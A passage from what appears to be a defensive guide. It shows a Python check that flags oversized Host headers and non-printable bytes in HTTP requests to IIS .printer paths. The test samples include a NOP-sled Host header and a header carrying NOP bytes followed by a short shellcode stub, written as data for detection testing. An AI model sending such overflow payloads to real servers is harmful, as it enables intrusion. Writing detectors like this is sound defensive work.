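    host = headers.get(b"host", b"")
    if len(host) > host_limit:
        findings.append(f"Host header is {len(host)} bytes (limit {host_limit})")
    for name, value in headers.items():
        # Raw machine code in a header (the \x90 sleds and shellcode above) is never legitimate.
        if any(b < 0x20 or b > 0x7e for b in value):
            findings.append(f"non-printable bytes in header {name.decode('latin-1')!r}")
    return findings


# Constructed samples (not captured traffic).
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n"
SAFE_PRINTER = b"GET /printers/lp.printer HTTP/1.0\r\nHost: intranet\r\n\r\n"
OVERSIZED_HOST = b"GET /NULL.printer HTTP/1.0\r\nHost: " + b"\x90" * 300 + b"\r\n\r\n"
SHELLCODE_HEADER = b"\nGET /NULL.printer HTTP/1.0\nBeavuh: " + b"\x90" * 20 + b"\xeb\x03\x5d\r\nHost: x\r\n\r\n"

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN), ("safe .printer", SAFE_PRINTER),
                          ("oversized Host", OVERSIZED_HOST), ("shellcode header", SHELLCODE_HEADER)]:
        print(label, "->", check_request(sample) or "clean")
```

    A legitimate .printer request with a short, printable Host value is left
    alone, so the rule does not break web-based printing for hosts that still need it.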